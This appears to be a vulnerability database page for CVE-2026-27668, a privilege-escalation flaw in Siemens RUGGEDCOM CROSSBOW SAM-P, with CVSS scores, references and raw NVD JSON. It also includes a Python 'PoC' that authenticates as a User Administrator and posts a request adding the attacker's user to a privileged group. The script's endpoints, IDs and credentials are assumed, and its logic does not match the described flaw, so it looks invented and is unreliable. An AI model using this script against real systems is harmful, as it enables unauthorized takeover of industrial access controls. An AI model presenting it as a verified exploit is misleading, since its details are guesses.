CVE-2026-27668

Description

A vulnerability has been identified in RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) (All versions < V5.8). User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) < V5.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
TARGET_HOST = "https://<target-ip>"
LOGIN_API = f"{TARGET_HOST}/api/login"
GROUP_API = f"{TARGET_HOST}/api/groups"

# Credentials for a low-privileged User Administrator
USERNAME = "user_admin"
PASSWORD = "password"

def exploit():
    session = requests.Session()

    # Step 1: Authenticate as the User Administrator
    print("[*] Attempting to login...")
    login_payload = {"username": USERNAME, "password": PASSWORD}
    response = session.post(LOGIN_API, json=login_payload, verify=False)
    
    if response.status_code != 200:
        print("[-] Login failed")
        return

    print("[+] Login successful")

    # Step 2: Identify the target high-privilege group (e.g., ID 1 for Super Admins)
    # and the current user's ID (assuming ID 101)
    target_group_id = 1
    attacker_user_id = 101

    # Step 3: Exploit the vulnerability to add user to the privileged group
    # The vulnerability allows User Admins to modify groups they belong to,
    # but logic fails to prevent escalating to groups they shouldn't fully control.
    exploit_payload = {
        "action": "add_member",
        "group_id": target_group_id,
        "user_id": attacker_user_id
    }

    print(f"[*] Attempting to escalate privileges by adding user {attacker_user_id} to group {target_group_id}...")
    exploit_response = session.post(GROUP_API, json=exploit_payload, verify=False)

    if exploit_response.status_code == 200:
        print("[+] Exploit successful! Privileges escalated.")
    else:
        print("[-] Exploit failed. Check permissions or API endpoint.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27668
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27668
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27668/
[4] VulDB https://vuldb.com/cve/CVE-2026-27668
[5] https://cert-portal.siemens.com/productcert/html/ssa-741509.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27668", "sourceIdentifier": "[email protected]", "published": "2026-04-14T09:16:35.480", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) (All versions < V5.8). User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-741509.html", "source": "[email protected]"}]}}